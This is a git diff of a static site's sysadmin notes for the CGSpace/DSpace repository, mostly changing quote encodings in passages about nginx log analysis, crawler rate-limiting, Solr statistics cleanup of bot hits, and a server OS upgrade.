<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &quot;[0-9]{1,2}/Oct/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &#34;[0-9]{1,2}/Oct/2019&#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E &quot;/rest/bitstreams&quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#34;/rest/bitstreams&#34;
106781
</code></pre><ul>
<li>The types of requests in the access logs are (by lazily extracting the sixth field in the nginx log)</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | awk '{print $6}' | sed 's/&quot;//' | sort | uniq -c | sort -n
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | awk &#39;{print $6}&#39; | sed &#39;s/&#34;//&#39; | sort | uniq -c | sort -n
1 PUT
8 PROPFIND
283 OPTIONS
@ -177,7 +177,7 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Two very active IPs are 34.224.4.16 and 34.234.204.152, which made over 360,000 requests in October:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep -c -E '(34\.224\.4\.16|34\.234\.204\.152)'
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep -c -E &#39;(34\.224\.4\.16|34\.234\.204\.152)&#39;
365288
</code></pre><ul>
<li>Their user agent is one I&rsquo;ve never seen before:</li>
@ -186,22 +186,22 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</code></pre><ul>
<li>Most of them seem to be to community or collection discover and browse results pages like <code>/handle/10568/103/discover</code>:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -o -E &quot;GET /(bitstream|discover|handle)&quot; | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
6566 GET /bitstream
351928 GET /handle
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c discover
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c discover
214209
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &quot;[0-9]{1,2}/Oct/2019&quot; | grep Amazonbot | grep -E &quot;GET /(bitstream|discover|handle)&quot; | grep -c browse
# zcat --force /var/log/nginx/*access.log.*.gz | grep -E &#34;[0-9]{1,2}/Oct/2019&#34; | grep Amazonbot | grep -E &#34;GET /(bitstream|discover|handle)&#34; | grep -c browse
86874
</code></pre><ul>
<li>As far as I can tell, none of their requests are counted in the Solr statistics:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=(ip%3A34.224.4.16+OR+ip%3A34.234.204.152)&amp;rows=0&amp;wt=json&amp;indent=true&#39;
</code></pre><ul>
<li>Still, those requests are CPU intensive so I will add their user agent to the &ldquo;badbots&rdquo; rate limiting in nginx to reduce the impact on server load</li>
<li>After deploying it I checked by setting my user agent to Amazonbot and making a few requests (which were denied with HTTP 503):</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/1/discover' User-Agent:&quot;Amazonbot/0.1&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/1/discover&#39; User-Agent:&#34;Amazonbot/0.1&#34;
</code></pre><ul>
<li>On the topic of spiders, I have been wanting to update DSpace&rsquo;s default list of spiders in <code>config/spiders/agents</code>, perhaps by dropping a new list in from <a href="https://github.com/atmire/COUNTER-Robots">Atmire&rsquo;s COUNTER-Robots</a> project
<ul>
@ -210,23 +210,23 @@ Let&rsquo;s see how many of the REST API requests were for bitstreams (because t
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;iskanie&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;iskanie&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;iskanie&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;iskanie&#34;
</code></pre><ul>
<li>A bit later I checked Solr and found three requests from my IP with that user agent this month:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0'
&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=ip:73.178.9.24+AND+userAgent:iskanie&amp;fq=dateYearMonth%3A2019-11&amp;rows=0&#39;
&lt;?xml version=&#34;1.0&#34; encoding=&#34;UTF-8&#34;?&gt;
&lt;response&gt;
&lt;lst name=&quot;responseHeader&quot;&gt;&lt;int name=&quot;status&quot;&gt;0&lt;/int&gt;&lt;int name=&quot;QTime&quot;&gt;1&lt;/int&gt;&lt;lst name=&quot;params&quot;&gt;&lt;str name=&quot;q&quot;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&quot;fq&quot;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&quot;rows&quot;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&quot;response&quot; numFound=&quot;3&quot; start=&quot;0&quot;&gt;&lt;/result&gt;
&lt;lst name=&#34;responseHeader&#34;&gt;&lt;int name=&#34;status&#34;&gt;0&lt;/int&gt;&lt;int name=&#34;QTime&#34;&gt;1&lt;/int&gt;&lt;lst name=&#34;params&#34;&gt;&lt;str name=&#34;q&#34;&gt;ip:73.178.9.24 AND userAgent:iskanie&lt;/str&gt;&lt;str name=&#34;fq&#34;&gt;dateYearMonth:2019-11&lt;/str&gt;&lt;str name=&#34;rows&#34;&gt;0&lt;/str&gt;&lt;/lst&gt;&lt;/lst&gt;&lt;result name=&#34;response&#34; numFound=&#34;3&#34; start=&#34;0&#34;&gt;&lt;/result&gt;
&lt;/response&gt;
</code></pre><ul>
<li>Now I want to make similar requests with a user agent that is included in DSpace&rsquo;s current user agent list:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;celestial&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y' User-Agent:&quot;celestial&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;celestial&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/bitstream/handle/10568/105487/csl_Crane_oct2019.pptx?sequence=1&amp;isAllowed=y&#39; User-Agent:&#34;celestial&#34;
</code></pre><ul>
<li>After twenty minutes I didn&rsquo;t see any requests in Solr, so I assume they did not get logged because they matched a bot list&hellip;
<ul>
@ -247,7 +247,7 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
</ul>
</li>
</ul>
<pre tabindex="0"><code>else if (line.hasOption('m'))
<pre tabindex="0"><code>else if (line.hasOption(&#39;m&#39;))
{
SolrLogger.markRobotsByIP();
}
@ -263,16 +263,16 @@ $ http --print Hh 'https://dspacetest.cgiar.org/bitstream/handle/10568/105487/cs
<ul>
<li>I added &ldquo;alanfuu2&rdquo; to the example spiders file, restarted Tomcat, then made two requests to DSpace Test:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu1&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;alanfuuu2&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu1&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;alanfuuu2&#34;
</code></pre><ul>
<li>After committing the changes in Solr I saw one request for &ldquo;alanfuu1&rdquo; and no requests for &ldquo;alanfuu2&rdquo;:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu1&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:alanfuuu2&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>So basically it seems like a win to update the example file with the latest one from Atmire&rsquo;s COUNTER-Robots list
<ul>
@ -281,16 +281,16 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:alanf
</li>
<li>I&rsquo;m curious how the special character matching is in Solr, so I will test two requests: one with &ldquo;<a href="http://www.gnip.com">www.gnip.com</a>&rdquo; which is in the spider list, and one with &ldquo;<a href="http://www.gnyp.com">www.gnyp.com</a>&rdquo; which isn&rsquo;t:</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnip.com&quot;
$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;www.gnyp.com&quot;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnip.com&#34;
$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;www.gnyp.com&#34;
</code></pre><ul>
<li>Then commit changes to Solr so we don&rsquo;t have to wait:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics/update?commit=true'
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
$ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics/update?commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnip.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics/select?q=userAgent:www.gnyp.com&amp;fq=dateYearMonth%3A2019-11&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>So the blocking seems to be working because &ldquo;www.gnip.com&rdquo; is one of the new patterns added to the spiders file&hellip;</li>
</ul>
@ -314,24 +314,24 @@ $ http --print b 'http://localhost:8081/solr/statistics/select?q=userAgent:www.g
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;62944&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:BUbiNG*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;62944&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Similar for com.plumanalytics, Grammarly, and ltx71!</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;28256&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;6288&quot; start=&quot;0&quot;&gt;
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;105663&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:
*com.plumanalytics*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;28256&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*Grammarly*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;6288&#34; start=&#34;0&#34;&gt;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;105663&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Deleting these seems to work, for example the 105,000 ltx71 records from 2018:</li>
</ul>
<pre tabindex="0"><code>$ http --print b 'http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true'
$ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*' | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;0&quot; start=&quot;0&quot;/&gt;
<pre tabindex="0"><code>$ http --print b &#39;http://localhost:8081/solr/statistics-2018/update?stream.body=&lt;delete&gt;&lt;query&gt;userAgent:*ltx71*&lt;/query&gt;&lt;query&gt;type:0&lt;/query&gt;&lt;/delete&gt;&amp;commit=true&#39;
$ http --print b &#39;http://localhost:8081/solr/statistics-2018/select?facet=true&amp;facet.field=ip&amp;facet.mincount=1&amp;type:0&amp;q=userAgent:*ltx71*&#39; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;0&#34; start=&#34;0&#34;/&gt;
</code></pre><ul>
<li>I wrote a quick bash script to check all these user agents against the CGSpace Solr statistics cores
<ul>
@ -341,21 +341,21 @@ $ http --print b 'http://localhost:8081/solr/statistics-2018/select?facet=true&a
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*' | xmllint --format - | less
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select?facet=true&amp;facet.field=dateYearMonth&amp;facet.mincount=1&amp;facet.offset=0&amp;facet.limit=
12&amp;q=userAgent:*Unpaywall*&#39; | xmllint --format - | less
...
&lt;lst name=&quot;facet_counts&quot;&gt;
&lt;lst name=&quot;facet_queries&quot;/&gt;
&lt;lst name=&quot;facet_fields&quot;&gt;
&lt;lst name=&quot;dateYearMonth&quot;&gt;
&lt;int name=&quot;2019-10&quot;&gt;198624&lt;/int&gt;
&lt;int name=&quot;2019-05&quot;&gt;88422&lt;/int&gt;
&lt;int name=&quot;2019-06&quot;&gt;79911&lt;/int&gt;
&lt;int name=&quot;2019-09&quot;&gt;67065&lt;/int&gt;
&lt;int name=&quot;2019-07&quot;&gt;39026&lt;/int&gt;
&lt;int name=&quot;2019-08&quot;&gt;36889&lt;/int&gt;
&lt;int name=&quot;2019-04&quot;&gt;36512&lt;/int&gt;
&lt;int name=&quot;2019-11&quot;&gt;760&lt;/int&gt;
&lt;lst name=&#34;facet_counts&#34;&gt;
&lt;lst name=&#34;facet_queries&#34;/&gt;
&lt;lst name=&#34;facet_fields&#34;&gt;
&lt;lst name=&#34;dateYearMonth&#34;&gt;
&lt;int name=&#34;2019-10&#34;&gt;198624&lt;/int&gt;
&lt;int name=&#34;2019-05&#34;&gt;88422&lt;/int&gt;
&lt;int name=&#34;2019-06&#34;&gt;79911&lt;/int&gt;
&lt;int name=&#34;2019-09&#34;&gt;67065&lt;/int&gt;
&lt;int name=&#34;2019-07&#34;&gt;39026&lt;/int&gt;
&lt;int name=&#34;2019-08&#34;&gt;36889&lt;/int&gt;
&lt;int name=&#34;2019-04&#34;&gt;36512&lt;/int&gt;
&lt;int name=&#34;2019-11&#34;&gt;760&lt;/int&gt;
&lt;/lst&gt;
&lt;/lst&gt;
</code></pre><ul>
@ -423,17 +423,17 @@ istics-2014 statistics-2013 statistics-2012 statistics-2011 statistics-2010; do
</li>
<li>Testing modifying some of the COUNTER-Robots patterns to use <code>[0-9]</code> instead of <code>\d</code> digit character type, as Solr&rsquo;s regex search can&rsquo;t use those</li>
</ul>
<pre tabindex="0"><code>$ http --print Hh 'https://dspacetest.cgiar.org/handle/10568/105487' User-Agent:&quot;Scrapoo/1&quot;
$ http &quot;http://localhost:8081/solr/statistics/update?commit=true&quot;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
$ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&quot; | xmllint --format - | grep numFound
&lt;result name=&quot;response&quot; numFound=&quot;1&quot; start=&quot;0&quot;&gt;
<pre tabindex="0"><code>$ http --print Hh &#39;https://dspacetest.cgiar.org/handle/10568/105487&#39; User-Agent:&#34;Scrapoo/1&#34;
$ http &#34;http://localhost:8081/solr/statistics/update?commit=true&#34;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:Scrapoo*&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
$ http &#34;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/[0-9]/&#34; | xmllint --format - | grep numFound
&lt;result name=&#34;response&#34; numFound=&#34;1&#34; start=&#34;0&#34;&gt;
</code></pre><ul>
<li>Nice, so searching with regex in Solr with <code>//</code> syntax works for those digits!</li>
<li>I realized that it&rsquo;s easier to search Solr from curl via POST using this syntax:</li>
</ul>
<pre tabindex="0"><code>$ curl -s &quot;http://localhost:8081/solr/statistics/select&quot; -d &quot;q=userAgent:*Scrapoo*&amp;rows=0&quot;)
<pre tabindex="0"><code>$ curl -s &#34;http://localhost:8081/solr/statistics/select&#34; -d &#34;q=userAgent:*Scrapoo*&amp;rows=0&#34;)
</code></pre><ul>
<li>If the parameters include something like &ldquo;[0-9]&rdquo; then curl interprets it as a range and will make ten requests
<ul>
@ -441,7 +441,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ curl -s 'http://localhost:8081/solr/statistics/select' -d 'q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2'
<pre tabindex="0"><code>$ curl -s &#39;http://localhost:8081/solr/statistics/select&#39; -d &#39;q=userAgent:/Postgenomic(\s|\+)v2/&amp;rows=2&#39;
</code></pre><ul>
<li>I updated the <code>check-spider-hits.sh</code> script to use the POST syntax, and I&rsquo;m evaluating the feasability of including the regex search patterns from the spider agent file, as I had been filtering them out due to differences in PCRE and Solr regex syntax and issues with shell handling</li>
</ul>
@ -450,7 +450,7 @@ $ http &quot;http://localhost:8081/solr/statistics/select?q=userAgent:/Scrapoo\/
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/iwmi-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-11-14-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-11-14-combined-orcids.txt -o /tmp/2019-11-14-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml

View File

@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,7 +153,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# tar czf 2019-12-01-linode18-etc.tar.gz /etc
</code></pre><ul>
<li>Then check all third-party repositories in /etc/apt to see if everything using &ldquo;xenial&rdquo; has packages available for &ldquo;bionic&rdquo; and then update the sources:</li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/' /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/&rsquo; /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li>Pause the Uptime Robot monitoring for CGSpace</li>
<li>Make sure the update manager is installed and do the upgrade:</li>
</ul>
@ -163,7 +163,7 @@ Make sure all packages are up to date and the package manager is up to date, the
<li>After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:</li>
</ul>
<pre tabindex="0"><code># apt purge openjdk-11-jre-headless
# apt install 'nginx=1.16.1-1~bionic'
# apt install &#39;nginx=1.16.1-1~bionic&#39;
# reboot
</code></pre><ul>
<li>After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it&rsquo;s working:</li>
@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/cgspace-104030.xml
$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/dspacetest-104030.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/cgspace-104030.xml
$ http &#39;https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/dspacetest-104030.xml
</code></pre><ul>
<li>The DSpace Test ones actually now capture the DOI, where the CGSpace doesn&rsquo;t&hellip;</li>
<li>And the DSpace Test one doesn&rsquo;t include review status as <code>dc.description</code>, but I don&rsquo;t think that&rsquo;s an important field</li>
@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPref
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable=&#39;f&#39; AND item.in_archive=&#39;t&#39; AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
COPY 48
</code></pre><h2 id="2019-12-05">2019-12-05</h2>
<ul>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)</li>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers&rsquo; Retreat in Nairobi, Kenya (via Skype)</li>
<li>Send some pull requests to the cg-core schema repository:
<ul>
<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
@ -288,14 +288,14 @@ COPY 48
<li>I looked into creating RTF documents from HTML in Node.js and there is a library called <a href="https://www.npmjs.com/package/html-to-rtf">html-to-rtf</a> that works well, but doesn&rsquo;t support images</li>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.sponsor&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.sponsor&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
COPY 643
</code></pre><h2 id="2019-12-18">2019-12-18</h2>
<ul>
<li>Apply the investor corrections and deletions from Peter on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Peter asked about the &ldquo;Open Government Licence 3.0&rdquo; that is used by <a href="">some items</a>
<ul>
@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
</ul>
</li>
</ul>
